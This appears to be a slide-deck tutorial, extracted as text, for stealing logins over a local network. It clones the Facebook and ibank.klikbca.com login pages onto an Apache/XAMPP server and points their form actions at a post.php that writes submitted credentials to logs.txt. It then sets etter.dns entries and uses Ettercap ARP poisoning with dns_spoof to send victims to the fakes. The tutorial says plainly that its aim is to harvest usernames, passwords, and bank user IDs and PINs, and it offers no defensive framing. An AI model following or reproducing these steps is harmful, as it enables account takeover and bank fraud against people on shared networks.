You are on page 1of 45

Edit file httpd.

conf at /opt/lampp/etc
Remove # in front of:
LoadModule vhost_alias_module modules/mod_vhost_alias.so
and
Include conf/extra/httpd-vhosts.conf

Edit file httpd-xampp.conf at /opt/lampp/etc/extra


Add:
Allow from all
Allow from 192.168.1.0/16
Allow from 127.0.0.0/16
Allow from 10.0.0.0/16
Allow from 169.254.0.0/16
Require all granted

Edit file httpd-vhosts.conf at /opt/lampp/etc/extra


Add:
DocumentRoot /opt/lampp/htdocs/
ServerName localhost
<Directory /opt/lampp/htdocs />,
Require all granted
</Directory>

accessed from other computer..

Edit file etter.dns at /etc/ettercap


Change:
facebook.com A <my IP address>
gmail.com A <my IP address>
google.com A <my IP address>
yahoo.com A <my IP address>

Sniff >>> Unified Sniffing

Host >>> Scan for Hosts


Hosts >>> Hosts List
192.168.1.1 >>> Add to Target 1

Plugins >>> Manage the plugins


double-clicks dns_spoof

Mitm >>> ARP poisoning


Check >>> Sniff remote connection

Start >>> Start sniffing

Google.com >>> Hacked!


Yahoo.com >>> Hacked!
Facebook.com >>> Hacked!
Gmail.com >>> Hacked!

to save www.facebook.com as
index.html file, then..
copy it to /opt/lampp/htdocs

to make post.php file to store


username and password stolen from
fake index.html file of
www.facebook.com
notice..make blank file with name
of logs.txt
notice again..make login.html as
fake html of FAILED login

to change
<action=https://www.facebook.com.....>
with <action=post.php>

to save FAILED login of


facebook.com as login.html, then..
copy it to /opt/lampp/htdocs

to make all files in


/opt/lampp/htdocs to be able to
execute by applying command
chmod 777 *.*

to edit etter.dns file at /etc/ettercap and


to change :
facebook.com A 192.168.1.110
*.facebook.com A 192.168.1.110
www.facebook.com PTR 192.168.1.110

to run Apache server with XAMPP, then..


to test it with localhost in browser

to test it from other computer, then..


to run :
echo 1 > /proc/sys/net/ipv4/ip_forward

Sniff >>> Unified Sniffing

to run Ettercap for DNS Spoofing and ARP Poisoning

Host >>> Scan for Hosts


Hosts >>> Hosts List
192.168.1.1 >>> Add to Target 1

Plugins >>> Manage the plugins


double-clicks dns_spoof

Mitm >>> ARP poisoning


Check >>> Sniff remote connection

Start >>> Start sniffing

to harvest username and password


fromspoofed and poisoned
www.facebook.com stored in
logs.txt

to save ibank.klikbca.com as
index.html file, then..
copy it to /opt/lampp/htdocs

to find /authentication.do then


replace it with post.php

to take a note:
value(user_id) and value(pswd)

to save failed authentication page at


ibank.klikbca.com as login.html file,
then..
copy it to /opt/lampp/htdocs

to make a post.php file


to remember to put:
value(user_id) and value(pswd)
and to make a blank logs.txt file

to make sure all files stored in


/opt/lampp/htdocs, then..
run chmod 777 *.* so all files can be
read-write-execute

to run Apache server and make sure


everything runs well by checking it
through localhost

Sniff >>> Unified Sniffing

to run Ettercap for DNS Spoofing and ARP Poisoning

Host >>> Scan for Hosts


Hosts >>> Hosts List
192.168.1.1 >>> Add to Target 1

Plugins >>> Manage the plugins


double-clicks dns_spoof
Mitm >>> ARP poisoning
Check >>> Sniff remote connection

Start >>> Start sniffing

to access ibank.klikbca.com from


other computer or target

to harvest user ID and PIN of targets


while displaying failed authentication

You might also like